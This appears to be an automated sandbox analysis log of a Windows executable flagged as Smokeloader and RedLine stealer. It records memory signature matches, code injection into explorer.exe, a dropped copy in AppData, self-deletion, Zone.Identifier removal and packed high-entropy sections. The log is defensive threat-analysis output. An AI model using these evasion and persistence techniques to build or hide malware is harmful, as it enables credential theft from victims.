      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 4964
      Source: 3sfCdeA1H2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 3sfCdeA1H2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: tttcvva.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@4/9@4/1
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_02CDFA88 CreateToolhelp32Snapshot,Module32First,0_2_02CDFA88
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tttcvvaJump to behavior
      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
      Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\a0e0b845-927d-4c94-8d32-fda738e17b8cJump to behavior
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: 3sfCdeA1H2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 3sfCdeA1H2.exeReversingLabs: Detection: 42%
      Source: 3sfCdeA1H2.exeVirustotal: Detection: 38%
      Source: unknownProcess created: C:\Users\user\Desktop\3sfCdeA1H2.exe "C:\Users\user\Desktop\3sfCdeA1H2.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tttcvva C:\Users\user\AppData\Roaming\tttcvva
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 4964
      Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msxml6.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeUnpacked PE file: 0.2.3sfCdeA1H2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dasu:W;.dedileg:W;.rsrc:R; vs .text:EW;
      Source: 3sfCdeA1H2.exeStatic PE information: section name: .dasu
      Source: 3sfCdeA1H2.exeStatic PE information: section name: .dedileg
      Source: tttcvva.1.drStatic PE information: section name: .dasu
      Source: tttcvva.1.drStatic PE information: section name: .dedileg
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_02C91540 pushad ; ret 0_2_02C91550
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_02CE34E1 push esp; ret 0_2_02CE34E3
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_02CE1884 push B63524ADh; retn 001Fh0_2_02CE18BB
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_02CE2381 pushfd ; iretd 0_2_02CE2382
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_004031DB push eax; ret 5_2_004032AB
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_02C64669 push esp; ret 5_2_02C6466B
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_02C62A0C push B63524ADh; retn 001Fh5_2_02C62A43
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_02C63509 pushfd ; iretd 5_2_02C6350A
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_04771540 pushad ; ret 5_2_04771550
      Source: 3sfCdeA1H2.exeStatic PE information: section name: .text entropy: 7.485220555336947
      Source: tttcvva.1.drStatic PE information: section name: .text entropy: 7.485220555336947
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tttcvvaJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tttcvvaJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\3sfcdea1h2.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\tttcvva:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
